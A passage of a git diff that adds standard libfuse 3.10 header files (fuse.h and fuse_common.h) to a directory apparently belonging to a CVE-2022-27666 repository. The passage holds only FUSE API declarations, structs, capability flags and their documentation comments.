+ */ + int (*fallocate) (const char *, int, off_t, off_t, + struct fuse_file_info *); + + /** + * Copy a range of data from one file to another + * + * Performs an optimized copy between two file descriptors without the + * additional cost of transferring data through the FUSE kernel module + * to user space (glibc) and then back into the FUSE filesystem again. + * + * In case this method is not implemented, applications are expected to + * fall back to a regular file copy. (Some glibc versions did this + * emulation automatically, but the emulation has been removed from all + * glibc release branches.) + */ + ssize_t (*copy_file_range) (const char *path_in, + struct fuse_file_info *fi_in, + off_t offset_in, const char *path_out, + struct fuse_file_info *fi_out, + off_t offset_out, size_t size, int flags); + + /** + * Find next data or hole after the specified offset + */ + off_t (*lseek) (const char *, off_t off, int whence, struct fuse_file_info *); +}; + +/** Extra context that may be needed by some filesystems + * + * The uid, gid and pid fields are not filled in case of a writepage + * operation. + */ +struct fuse_context { + /** Pointer to the fuse object */ + struct fuse *fuse; + + /** User ID of the calling process */ + uid_t uid; + + /** Group ID of the calling process */ + gid_t gid; + + /** Process ID of the calling thread */ + pid_t pid; + + /** Private filesystem data */ + void *private_data; + + /** Umask of the calling process */ + mode_t umask; +}; + +/** + * Main function of FUSE. + * + * This is for the lazy. This is all that has to be called from the + * main() function. 
+ * + * This function does the following: + * - parses command line options, and handles --help and + * --version + * - installs signal handlers for INT, HUP, TERM and PIPE + * - registers an exit handler to unmount the filesystem on program exit + * - creates a fuse handle + * - registers the operations + * - calls either the single-threaded or the multi-threaded event loop + * + * Most file systems will have to parse some file-system specific + * arguments before calling this function. It is recommended to do + * this with fuse_opt_parse() and a processing function that passes + * through any unknown options (this can also be achieved by just + * passing NULL as the processing function). That way, the remaining + * options can be passed directly to fuse_main(). + * + * fuse_main() accepts all options that can be passed to + * fuse_parse_cmdline(), fuse_new(), or fuse_session_new(). + * + * Option parsing skips argv[0], which is assumed to contain the + * program name. This element must always be present and is used to + * construct a basic ``usage: `` message for the --help + * output. argv[0] may also be set to the empty string. In this case + * the usage message is suppressed. This can be used by file systems + * to print their own usage line first. See hello.c for an example of + * how to do this. + * + * Note: this is currently implemented as a macro. + * + * The following error codes may be returned from fuse_main(): + * 1: Invalid option arguments + * 2: No mount point specified + * 3: FUSE setup failed + * 4: Mounting failed + * 5: Failed to daemonize (detach from session) + * 6: Failed to set up signal handlers + * 7: An error occurred during the life of the file system + * + * @param argc the argument counter passed to the main() function + * @param argv the argument vector passed to the main() function + * @param op the file system operation + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. 
May be overridden by the + * `struct fuse_operations.init` handler. + * @return 0 on success, nonzero on failure + * + * Example usage, see hello.c + */ +/* + int fuse_main(int argc, char *argv[], const struct fuse_operations *op, + void *private_data); +*/ +#define fuse_main(argc, argv, op, private_data) \ + fuse_main_real(argc, argv, op, sizeof(*(op)), private_data) + +/* ----------------------------------------------------------- * + * More detailed API * + * ----------------------------------------------------------- */ + +/** + * Print available options (high- and low-level) to stdout. This is + * not an exhaustive list, but includes only those options that may be + * of interest to an end-user of a file system. + * + * The function looks at the argument vector only to determine if + * there are additional modules to be loaded (module=foo option), + * and attempts to call their help functions as well. + * + * @param args the argument vector. + */ +void fuse_lib_help(struct fuse_args *args); + +/** + * Create a new FUSE filesystem. + * + * This function accepts most file-system independent mount options + * (like context, nodev, ro - see mount(8)), as well as the + * FUSE-specific mount options from mount.fuse(8). + * + * If the --help option is specified, the function writes a help text + * to stdout and returns NULL. + * + * Option parsing skips argv[0], which is assumed to contain the + * program name. This element must always be present and is used to + * construct a basic ``usage: `` message for the --help output. If + * argv[0] is set to the empty string, no usage message is included in + * the --help output. + * + * If an unknown option is passed in, an error message is written to + * stderr and the function returns NULL. + * + * @param args argument vector + * @param op the filesystem operations + * @param op_size the size of the fuse_operations structure + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. 
May be overridden by the + * `struct fuse_operations.init` handler. + * @return the created FUSE handle + */ +#if FUSE_USE_VERSION == 30 +struct fuse *fuse_new_30(struct fuse_args *args, const struct fuse_operations *op, + size_t op_size, void *private_data); +#define fuse_new(args, op, size, data) fuse_new_30(args, op, size, data) +#else +struct fuse *fuse_new(struct fuse_args *args, const struct fuse_operations *op, + size_t op_size, void *private_data); +#endif + +/** + * Mount a FUSE file system. + * + * @param mountpoint the mount point path + * @param f the FUSE handle + * + * @return 0 on success, -1 on failure. + **/ +int fuse_mount(struct fuse *f, const char *mountpoint); + +/** + * Unmount a FUSE file system. + * + * See fuse_session_unmount() for additional information. + * + * @param f the FUSE handle + **/ +void fuse_unmount(struct fuse *f); + +/** + * Destroy the FUSE handle. + * + * NOTE: This function does not unmount the filesystem. If this is + * needed, call fuse_unmount() before calling this function. + * + * @param f the FUSE handle + */ +void fuse_destroy(struct fuse *f); + +/** + * FUSE event loop. + * + * Requests from the kernel are processed, and the appropriate + * operations are called. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * @param f the FUSE handle + * @return see fuse_session_loop() + * + * See also: fuse_loop_mt() + */ +int fuse_loop(struct fuse *f); + +/** + * Flag session as terminated + * + * This function will cause any running event loops to exit on + * the next opportunity. 
+ * + * @param f the FUSE handle + */ +void fuse_exit(struct fuse *f); + +#if FUSE_USE_VERSION < 32 +int fuse_loop_mt_31(struct fuse *f, int clone_fd); +#define fuse_loop_mt(f, clone_fd) fuse_loop_mt_31(f, clone_fd) +#else +/** + * FUSE event loop with multiple threads + * + * Requests from the kernel are processed, and the appropriate + * operations are called. Requests are processed in parallel by + * distributing them between multiple threads. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * Note: using fuse_loop() instead of fuse_loop_mt() means you are running in + * single-threaded mode, and that you will not have to worry about reentrancy, + * though you will have to worry about recursive lookups. In single-threaded + * mode, FUSE will wait for one callback to return before calling another. + * + * Enabling multiple threads, by using fuse_loop_mt(), will cause FUSE to make + * multiple simultaneous calls into the various callback functions given by your + * fuse_operations record. + * + * If you are using multiple threads, you can enjoy all the parallel execution + * and interactive response benefits of threads, and you get to enjoy all the + * benefits of race conditions and locking bugs, too. Ensure that any code used + * in the callback function of fuse_operations is also thread-safe. + * + * @param f the FUSE handle + * @param config loop configuration + * @return see fuse_session_loop() + * + * See also: fuse_loop() + */ +int fuse_loop_mt(struct fuse *f, struct fuse_loop_config *config); +#endif + +/** + * Get the current context + * + * The context is only valid for the duration of a filesystem + * operation, and thus must not be stored and used later.
+ * + * @return the context + */ +struct fuse_context *fuse_get_context(void); + +/** + * Get the current supplementary group IDs for the current request + * + * Similar to the getgroups(2) system call, except the return value is + * always the total number of group IDs, even if it is larger than the + * specified size. + * + * The current fuse kernel module in linux (as of 2.6.30) doesn't pass + * the group list to userspace, hence this function needs to parse + * "/proc/$TID/task/$TID/status" to get the group IDs. + * + * This feature may not be supported on all operating systems. In + * such a case this function will return -ENOSYS. + * + * @param size size of given array + * @param list array of group IDs to be filled in + * @return the total number of supplementary group IDs or -errno on failure + */ +int fuse_getgroups(int size, gid_t list[]); + +/** + * Check if the current request has already been interrupted + * + * @return 1 if the request has been interrupted, 0 otherwise + */ +int fuse_interrupted(void); + +/** + * Invalidates cache for the given path. + * + * This calls fuse_lowlevel_notify_inval_inode internally. + * + * @return 0 on successful invalidation, negative error value otherwise. + * This routine may return -ENOENT to indicate that there was + * no entry to be invalidated, e.g., because the path has not + * been seen before or has been forgotten; this should not be + * considered to be an error. + */ +int fuse_invalidate_path(struct fuse *f, const char *path); + +/** + * The real main function + * + * Do not call this directly, use fuse_main() + */ +int fuse_main_real(int argc, char *argv[], const struct fuse_operations *op, + size_t op_size, void *private_data); + +/** + * Start the cleanup thread when using option "remember". 
+ * + * This is done automatically by fuse_loop_mt() + * @param fuse struct fuse pointer for fuse instance + * @return 0 on success and -1 on error + */ +int fuse_start_cleanup_thread(struct fuse *fuse); + +/** + * Stop the cleanup thread when using option "remember". + * + * This is done automatically by fuse_loop_mt() + * @param fuse struct fuse pointer for fuse instance + */ +void fuse_stop_cleanup_thread(struct fuse *fuse); + +/** + * Iterate over cache removing stale entries + * use in conjunction with "-oremember" + * + * NOTE: This is already done for the standard sessions + * + * @param fuse struct fuse pointer for fuse instance + * @return the number of seconds until the next cleanup + */ +int fuse_clean_cache(struct fuse *fuse); + +/* + * Stacking API + */ + +/** + * Fuse filesystem object + * + * This opaque object represents a filesystem layer + */ +struct fuse_fs; + +/* + * These functions call the relevant filesystem operation, and return + * the result. + * + * If the operation is not defined, they return -ENOSYS, with the + * exception of fuse_fs_open, fuse_fs_release, fuse_fs_opendir, + * fuse_fs_releasedir and fuse_fs_statfs, which return 0.
+ */ + +int fuse_fs_getattr(struct fuse_fs *fs, const char *path, struct stat *buf, + struct fuse_file_info *fi); +int fuse_fs_rename(struct fuse_fs *fs, const char *oldpath, + const char *newpath, unsigned int flags); +int fuse_fs_unlink(struct fuse_fs *fs, const char *path); +int fuse_fs_rmdir(struct fuse_fs *fs, const char *path); +int fuse_fs_symlink(struct fuse_fs *fs, const char *linkname, + const char *path); +int fuse_fs_link(struct fuse_fs *fs, const char *oldpath, const char *newpath); +int fuse_fs_release(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_open(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_read(struct fuse_fs *fs, const char *path, char *buf, size_t size, + off_t off, struct fuse_file_info *fi); +int fuse_fs_read_buf(struct fuse_fs *fs, const char *path, + struct fuse_bufvec **bufp, size_t size, off_t off, + struct fuse_file_info *fi); +int fuse_fs_write(struct fuse_fs *fs, const char *path, const char *buf, + size_t size, off_t off, struct fuse_file_info *fi); +int fuse_fs_write_buf(struct fuse_fs *fs, const char *path, + struct fuse_bufvec *buf, off_t off, + struct fuse_file_info *fi); +int fuse_fs_fsync(struct fuse_fs *fs, const char *path, int datasync, + struct fuse_file_info *fi); +int fuse_fs_flush(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_statfs(struct fuse_fs *fs, const char *path, struct statvfs *buf); +int fuse_fs_opendir(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_readdir(struct fuse_fs *fs, const char *path, void *buf, + fuse_fill_dir_t filler, off_t off, + struct fuse_file_info *fi, enum fuse_readdir_flags flags); +int fuse_fs_fsyncdir(struct fuse_fs *fs, const char *path, int datasync, + struct fuse_file_info *fi); +int fuse_fs_releasedir(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi); +int fuse_fs_create(struct fuse_fs *fs, const char *path, mode_t mode, + struct 
fuse_file_info *fi); +int fuse_fs_lock(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, int cmd, struct flock *lock); +int fuse_fs_flock(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, int op); +int fuse_fs_chmod(struct fuse_fs *fs, const char *path, mode_t mode, + struct fuse_file_info *fi); +int fuse_fs_chown(struct fuse_fs *fs, const char *path, uid_t uid, gid_t gid, + struct fuse_file_info *fi); +int fuse_fs_truncate(struct fuse_fs *fs, const char *path, off_t size, + struct fuse_file_info *fi); +int fuse_fs_utimens(struct fuse_fs *fs, const char *path, + const struct timespec tv[2], struct fuse_file_info *fi); +int fuse_fs_access(struct fuse_fs *fs, const char *path, int mask); +int fuse_fs_readlink(struct fuse_fs *fs, const char *path, char *buf, + size_t len); +int fuse_fs_mknod(struct fuse_fs *fs, const char *path, mode_t mode, + dev_t rdev); +int fuse_fs_mkdir(struct fuse_fs *fs, const char *path, mode_t mode); +int fuse_fs_setxattr(struct fuse_fs *fs, const char *path, const char *name, + const char *value, size_t size, int flags); +int fuse_fs_getxattr(struct fuse_fs *fs, const char *path, const char *name, + char *value, size_t size); +int fuse_fs_listxattr(struct fuse_fs *fs, const char *path, char *list, + size_t size); +int fuse_fs_removexattr(struct fuse_fs *fs, const char *path, + const char *name); +int fuse_fs_bmap(struct fuse_fs *fs, const char *path, size_t blocksize, + uint64_t *idx); +#if FUSE_USE_VERSION < 35 +int fuse_fs_ioctl(struct fuse_fs *fs, const char *path, int cmd, + void *arg, struct fuse_file_info *fi, unsigned int flags, + void *data); +#else +int fuse_fs_ioctl(struct fuse_fs *fs, const char *path, unsigned int cmd, + void *arg, struct fuse_file_info *fi, unsigned int flags, + void *data); +#endif +int fuse_fs_poll(struct fuse_fs *fs, const char *path, + struct fuse_file_info *fi, struct fuse_pollhandle *ph, + unsigned *reventsp); +int fuse_fs_fallocate(struct fuse_fs *fs, const char *path, 
int mode, + off_t offset, off_t length, struct fuse_file_info *fi); +ssize_t fuse_fs_copy_file_range(struct fuse_fs *fs, const char *path_in, + struct fuse_file_info *fi_in, off_t off_in, + const char *path_out, + struct fuse_file_info *fi_out, off_t off_out, + size_t len, int flags); +off_t fuse_fs_lseek(struct fuse_fs *fs, const char *path, off_t off, int whence, + struct fuse_file_info *fi); +void fuse_fs_init(struct fuse_fs *fs, struct fuse_conn_info *conn, + struct fuse_config *cfg); +void fuse_fs_destroy(struct fuse_fs *fs); + +int fuse_notify_poll(struct fuse_pollhandle *ph); + +/** + * Create a new fuse filesystem object + * + * This is usually called from the factory of a fuse module to create + * a new instance of a filesystem. + * + * @param op the filesystem operations + * @param op_size the size of the fuse_operations structure + * @param private_data Initial value for the `private_data` + * field of `struct fuse_context`. May be overridden by the + * `struct fuse_operations.init` handler. + * @return a new filesystem object + */ +struct fuse_fs *fuse_fs_new(const struct fuse_operations *op, size_t op_size, + void *private_data); + +/** + * Factory for creating filesystem objects + * + * The function may use and remove options from 'args' that belong + * to this module. + * + * For now the 'fs' vector always contains exactly one filesystem. + * This is the filesystem which will be below the newly created + * filesystem in the stack. + * + * @param args the command line arguments + * @param fs NULL terminated filesystem object vector + * @return the new filesystem object + */ +typedef struct fuse_fs *(*fuse_module_factory_t)(struct fuse_args *args, + struct fuse_fs *fs[]); +/** + * Register filesystem module + * + * If the "-omodules=*name*_:..." option is present, filesystem + * objects are created and pushed onto the stack with the *factory_* + * function. 
+ * + * @param name_ the name of this filesystem module + * @param factory_ the factory function for this filesystem module + */ +#define FUSE_REGISTER_MODULE(name_, factory_) \ + fuse_module_factory_t fuse_module_ ## name_ ## _factory = factory_ + +/** Get session from fuse object */ +struct fuse_session *fuse_get_session(struct fuse *f); + +/** + * Open a FUSE file descriptor and set up the mount for the given + * mountpoint and flags. + * + * @param mountpoint reference to the mount in the file system + * @param options mount options + * @return the FUSE file descriptor or -1 upon error + */ +int fuse_open_channel(const char *mountpoint, const char *options); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h new file mode 100644 index 0000000000000000000000000000000000000000..ea4bdb02427d244c24dd87519ca3883e4a659f75 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_common.h @@ -0,0 +1,859 @@ +/* FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +/** @file */ + +#if !defined(FUSE_H_) && !defined(FUSE_LOWLEVEL_H_) +#error "Never include <fuse_common.h> directly; use <fuse.h> or <fuse_lowlevel.h> instead." +#endif + +#ifndef FUSE_COMMON_H_ +#define FUSE_COMMON_H_ + +#include "fuse_opt.h" +#include "fuse_log.h" +#include <stdint.h> +#include <sys/types.h> + +/** Major version of FUSE library interface */ +#define FUSE_MAJOR_VERSION 3 + +/** Minor version of FUSE library interface */ +#define FUSE_MINOR_VERSION 10 + +#define FUSE_MAKE_VERSION(maj, min) ((maj) * 100 + (min)) +#define FUSE_VERSION FUSE_MAKE_VERSION(FUSE_MAJOR_VERSION, FUSE_MINOR_VERSION) + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Information about an open file.
+ * + * File Handles are created by the open, opendir, and create methods and closed + * by the release and releasedir methods. Multiple file handles may be + * concurrently open for the same file. Generally, a client will create one + * file handle per file descriptor, though in some cases multiple file + * descriptors can share a single file handle. + */ +struct fuse_file_info { + /** Open flags. Available in open() and release() */ + int flags; + + /** In case of a write operation indicates if this was caused + by a delayed write from the page cache. If so, then the + context's pid, uid, and gid fields will not be valid, and + the *fh* value may not match the *fh* value that would + have been sent with the corresponding individual write + requests if write caching had been disabled. */ + unsigned int writepage : 1; + + /** Can be filled in by open, to use direct I/O on this file. */ + unsigned int direct_io : 1; + + /** Can be filled in by open. It signals the kernel that any + currently cached file data (ie., data that the filesystem + provided the last time the file was open) need not be + invalidated. Has no effect when set in other contexts (in + particular it does nothing when set by opendir()). */ + unsigned int keep_cache : 1; + + /** Indicates a flush operation. Set in flush operation, also + maybe set in highlevel lock operation and lowlevel release + operation. */ + unsigned int flush : 1; + + /** Can be filled in by open, to indicate that the file is not + seekable. */ + unsigned int nonseekable : 1; + + /* Indicates that flock locks for this file should be + released. If set, lock_owner shall contain a valid value. + May only be set in ->release(). */ + unsigned int flock_release : 1; + + /** Can be filled in by opendir. It signals the kernel to + enable caching of entries returned by readdir(). Has no + effect when set in other contexts (in particular it does + nothing when set by open()). */ + unsigned int cache_readdir : 1; + + /** Padding. 
Reserved for future use*/ + unsigned int padding : 25; + unsigned int padding2 : 32; + + /** File handle id. May be filled in by filesystem in create, + * open, and opendir(). Available in most other file operations on the + * same file handle. */ + uint64_t fh; + + /** Lock owner id. Available in locking operations and flush */ + uint64_t lock_owner; + + /** Requested poll events. Available in ->poll. Only set on kernels + which support it. If unsupported, this field is set to zero. */ + uint32_t poll_events; +}; + +/** + * Configuration parameters passed to fuse_session_loop_mt() and + * fuse_loop_mt(). + */ +struct fuse_loop_config { + /** + * whether to use separate device fds for each thread + * (may increase performance) + */ + int clone_fd; + + /** + * The maximum number of available worker threads before they + * start to get deleted when they become idle. If not + * specified, the default is 10. + * + * Adjusting this has performance implications; a very small number + * of threads in the pool will cause a lot of thread creation and + * deletion overhead and performance may suffer. When set to 0, a new + * thread will be created to service every operation. + */ + unsigned int max_idle_threads; +}; + +/************************************************************************** + * Capability bits for 'fuse_conn_info.capable' and 'fuse_conn_info.want' * + **************************************************************************/ + +/** + * Indicates that the filesystem supports asynchronous read requests. + * + * If this capability is not requested/available, the kernel will + * ensure that there is at most one pending read request per + * file-handle at any time, and will attempt to order read requests by + * increasing offset. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ASYNC_READ (1 << 0) + +/** + * Indicates that the filesystem supports "remote" locking. 
+ * + * This feature is enabled by default when supported by the kernel, + * and if getlk() and setlk() handlers are implemented. + */ +#define FUSE_CAP_POSIX_LOCKS (1 << 1) + +/** + * Indicates that the filesystem supports the O_TRUNC open flag. If + * disabled, and an application specifies O_TRUNC, fuse first calls + * truncate() and then open() with O_TRUNC filtered out. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ATOMIC_O_TRUNC (1 << 3) + +/** + * Indicates that the filesystem supports lookups of "." and "..". + * + * This feature is disabled by default. + */ +#define FUSE_CAP_EXPORT_SUPPORT (1 << 4) + +/** + * Indicates that the kernel should not apply the umask to the + * file mode on create operations. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_DONT_MASK (1 << 6) + +/** + * Indicates that libfuse should try to use splice() when writing to + * the fuse device. This may improve performance. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_SPLICE_WRITE (1 << 7) + +/** + * Indicates that libfuse should try to move pages instead of copying when + * writing to / reading from the fuse device. This may improve performance. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_SPLICE_MOVE (1 << 8) + +/** + * Indicates that libfuse should try to use splice() when reading from + * the fuse device. This may improve performance. + * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements a write_buf() handler. + */ +#define FUSE_CAP_SPLICE_READ (1 << 9) + +/** + * If set, the calls to flock(2) will be emulated using POSIX locks and must + * then be handled by the filesystem's setlock() handler. + * + * If not set, flock(2) calls will be handled by the FUSE kernel module + * internally (so any access that does not go through the kernel cannot be taken + * into account). 
+ * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements a flock() handler. + */ +#define FUSE_CAP_FLOCK_LOCKS (1 << 10) + +/** + * Indicates that the filesystem supports ioctl's on directories. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_IOCTL_DIR (1 << 11) + +/** + * Traditionally, while a file is open the FUSE kernel module only + * asks the filesystem for an update of the file's attributes when a + * client attempts to read beyond EOF. This is unsuitable for + * e.g. network filesystems, where the file contents may change + * without the kernel knowing about it. + * + * If this flag is set, FUSE will check the validity of the attributes + * on every read. If the attributes are no longer valid (i.e., if the + * *attr_timeout* passed to fuse_reply_attr() or set in `struct + * fuse_entry_param` has passed), it will first issue a `getattr` + * request. If the new mtime differs from the previous value, any + * cached file *contents* will be invalidated as well. + * + * This flag should always be set when available. If all file changes + * go through the kernel, *attr_timeout* should be set to a very large + * number to avoid unnecessary getattr() calls. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_AUTO_INVAL_DATA (1 << 12) + +/** + * Indicates that the filesystem supports readdirplus. + * + * This feature is enabled by default when supported by the kernel and if the + * filesystem implements a readdirplus() handler. + */ +#define FUSE_CAP_READDIRPLUS (1 << 13) + +/** + * Indicates that the filesystem supports adaptive readdirplus. + * + * If FUSE_CAP_READDIRPLUS is not set, this flag has no effect. + * + * If FUSE_CAP_READDIRPLUS is set and this flag is not set, the kernel + * will always issue readdirplus() requests to retrieve directory + * contents. 
+ * + * If FUSE_CAP_READDIRPLUS is set and this flag is set, the kernel + * will issue both readdir() and readdirplus() requests, depending on + * how much information is expected to be required. + * + * As of Linux 4.20, the algorithm is as follows: when userspace + * starts to read directory entries, issue a READDIRPLUS request to + * the filesystem. If any entry attributes have been looked up by the + * time userspace requests the next batch of entries, continue with + * READDIRPLUS, otherwise switch to plain READDIR. This will result + * in e.g. plain "ls" triggering READDIRPLUS first then READDIR after + * that because it doesn't do lookups. "ls -l" should result in all + * READDIRPLUS, except if dentries are already cached. + * + * This feature is enabled by default when supported by the kernel and + * if the filesystem implements both a readdirplus() and a readdir() + * handler. + */ +#define FUSE_CAP_READDIRPLUS_AUTO (1 << 14) + +/** + * Indicates that the filesystem supports asynchronous direct I/O submission. + * + * If this capability is not requested/available, the kernel will ensure that + * there is at most one pending read and one pending write request per direct + * I/O file-handle at any time. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_ASYNC_DIO (1 << 15) + +/** + * Indicates that writeback caching should be enabled. This means that + * individual write requests may be buffered and merged in the kernel + * before they are sent to the filesystem. + * + * This feature is disabled by default. + */ +#define FUSE_CAP_WRITEBACK_CACHE (1 << 16) + +/** + * Indicates support for zero-message opens. If this flag is set in + * the `capable` field of the `fuse_conn_info` structure, then the + * filesystem may return `ENOSYS` from the open() handler to indicate + * success. Further attempts to open files will be handled in the + * kernel.
(If this flag is not set, returning ENOSYS will be treated + * as an error and signaled to the caller). + * + * Setting (or unsetting) this flag in the `want` field has *no + * effect*. + */ +#define FUSE_CAP_NO_OPEN_SUPPORT (1 << 17) + +/** + * Indicates support for parallel directory operations. If this flag + * is unset, the FUSE kernel module will ensure that lookup() and + * readdir() requests are never issued concurrently for the same + * directory. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_PARALLEL_DIROPS (1 << 18) + +/** + * Indicates support for POSIX ACLs. + * + * If this feature is enabled, the kernel will cache and have + * responsibility for enforcing ACLs. ACL will be stored as xattrs and + * passed to userspace, which is responsible for updating the ACLs in + * the filesystem, keeping the file mode in sync with the ACL, and + * ensuring inheritance of default ACLs when new filesystem nodes are + * created. Note that this requires that the file system is able to + * parse and interpret the xattr representation of ACLs. + * + * Enabling this feature implicitly turns on the + * ``default_permissions`` mount option (even if it was not passed to + * mount(2)). + * + * This feature is disabled by default. + */ +#define FUSE_CAP_POSIX_ACL (1 << 19) + +/** + * Indicates that the filesystem is responsible for unsetting + * setuid and setgid bits when a file is written, truncated, or + * its owner is changed. + * + * This feature is enabled by default when supported by the kernel. + */ +#define FUSE_CAP_HANDLE_KILLPRIV (1 << 20) + +/** + * Indicates that the kernel supports caching symlinks in its page cache. + * + * When this feature is enabled, symlink targets are saved in the page cache. + * You can invalidate a cached link by calling: + * `fuse_lowlevel_notify_inval_inode(se, ino, 0, 0);` + * + * This feature is disabled by default. 
+ * If the kernel supports it (>= 4.20), you can enable this feature by + * setting this flag in the `want` field of the `fuse_conn_info` structure. + */ +#define FUSE_CAP_CACHE_SYMLINKS (1 << 23) + +/** + * Indicates support for zero-message opendirs. If this flag is set in + * the `capable` field of the `fuse_conn_info` structure, then the filesystem + * may return `ENOSYS` from the opendir() handler to indicate success. Further + * opendir and releasedir messages will be handled in the kernel. (If this + * flag is not set, returning ENOSYS will be treated as an error and signalled + * to the caller.) + * + * Setting (or unsetting) this flag in the `want` field has *no effect*. + */ +#define FUSE_CAP_NO_OPENDIR_SUPPORT (1 << 24) + +/** + * Indicates support for invalidating cached pages only on explicit request. + * + * If this flag is set in the `capable` field of the `fuse_conn_info` structure, + * then the FUSE kernel module supports invalidating cached pages only on + * explicit request by the filesystem through fuse_lowlevel_notify_inval_inode() + * or fuse_invalidate_path(). + * + * By setting this flag in the `want` field of the `fuse_conn_info` structure, + * the filesystem is responsible for invalidating cached pages through explicit + * requests to the kernel. + * + * Note that setting this flag does not prevent the cached pages from being + * flushed by OS itself and/or through user actions. + * + * Note that if both FUSE_CAP_EXPLICIT_INVAL_DATA and FUSE_CAP_AUTO_INVAL_DATA + * are set in the `capable` field of the `fuse_conn_info` structure then + * FUSE_CAP_AUTO_INVAL_DATA takes precedence. + * + * This feature is disabled by default. 
+ */ +#define FUSE_CAP_EXPLICIT_INVAL_DATA (1 << 25) + +/** + * Ioctl flags + * + * FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine + * FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed + * FUSE_IOCTL_RETRY: retry with new iovecs + * FUSE_IOCTL_DIR: is a directory + * + * FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs + */ +#define FUSE_IOCTL_COMPAT (1 << 0) +#define FUSE_IOCTL_UNRESTRICTED (1 << 1) +#define FUSE_IOCTL_RETRY (1 << 2) +#define FUSE_IOCTL_DIR (1 << 4) + +#define FUSE_IOCTL_MAX_IOV 256 + +/** + * Connection information, passed to the ->init() method + * + * Some of the elements are read-write, these can be changed to + * indicate the value requested by the filesystem. The requested + * value must usually be smaller than the indicated value. + */ +struct fuse_conn_info { + /** + * Major version of the protocol (read-only) + */ + unsigned proto_major; + + /** + * Minor version of the protocol (read-only) + */ + unsigned proto_minor; + + /** + * Maximum size of the write buffer + */ + unsigned max_write; + + /** + * Maximum size of read requests. A value of zero indicates no + * limit. However, even if the filesystem does not specify a + * limit, the maximum size of read requests will still be + * limited by the kernel. + * + * NOTE: For the time being, the maximum size of read requests + * must be set both here *and* passed to fuse_session_new() + * using the ``-o max_read=`` mount option. At some point + * in the future, specifying the mount option will no longer + * be necessary. + */ + unsigned max_read; + + /** + * Maximum readahead + */ + unsigned max_readahead; + + /** + * Capability flags that the kernel supports (read-only) + */ + unsigned capable; + + /** + * Capability flags that the filesystem wants to enable. + * + * libfuse attempts to initialize this field with + * reasonable default values before calling the init() handler. 
+ */ + unsigned want; + + /** + * Maximum number of pending "background" requests. A + * background request is any type of request for which the + * total number is not limited by other means. As of kernel + * 4.8, only two types of requests fall into this category: + * + * 1. Read-ahead requests + * 2. Asynchronous direct I/O requests + * + * Read-ahead requests are generated (if max_readahead is + * non-zero) by the kernel to preemptively fill its caches + * when it anticipates that userspace will soon read more + * data. + * + * Asynchronous direct I/O requests are generated if + * FUSE_CAP_ASYNC_DIO is enabled and userspace submits a large + * direct I/O request. In this case the kernel will internally + * split it up into multiple smaller requests and submit them + * to the filesystem concurrently. + * + * Note that the following requests are *not* background + * requests: writeback requests (limited by the kernel's + * flusher algorithm), regular (i.e., synchronous and + * buffered) userspace read/write requests (limited to one per + * thread), asynchronous read requests (Linux's io_submit(2) + * call actually blocks, so these are also limited to one per + * thread). + */ + unsigned max_background; + + /** + * Kernel congestion threshold parameter. If the number of pending + * background requests exceeds this number, the FUSE kernel module will + * mark the filesystem as "congested". This instructs the kernel to + * expect that queued requests will take some time to complete, and to + * adjust its algorithms accordingly (e.g. by putting a waiting thread + * to sleep instead of using a busy-loop). + */ + unsigned congestion_threshold; + + /** + * When FUSE_CAP_WRITEBACK_CACHE is enabled, the kernel is responsible + * for updating mtime and ctime when write requests are received. The + * updated values are passed to the filesystem with setattr() requests. 
+ * However, if the filesystem does not support the full resolution of + * the kernel timestamps (nanoseconds), the mtime and ctime values used + * by kernel and filesystem will differ (and result in an apparent + * change of times after a cache flush). + * + * To prevent this problem, this variable can be used to inform the + * kernel about the timestamp granularity supported by the file-system. + * The value should be a power of 10. The default is 1, i.e. full + * nano-second resolution. Filesystems supporting only second resolution + * should set this to 1000000000. + */ + unsigned time_gran; + + /** + * For future use. + */ + unsigned reserved[22]; +}; + +struct fuse_session; +struct fuse_pollhandle; +struct fuse_conn_info_opts; + +/** + * This function parses several command-line options that can be used + * to override elements of struct fuse_conn_info. The pointer returned + * by this function should be passed to the + * fuse_apply_conn_info_opts() method by the file system's init() + * handler. + * + * Before using this function, think twice if you really want these + * parameters to be adjustable from the command line. In most cases, + * they should be determined by the file system internally.
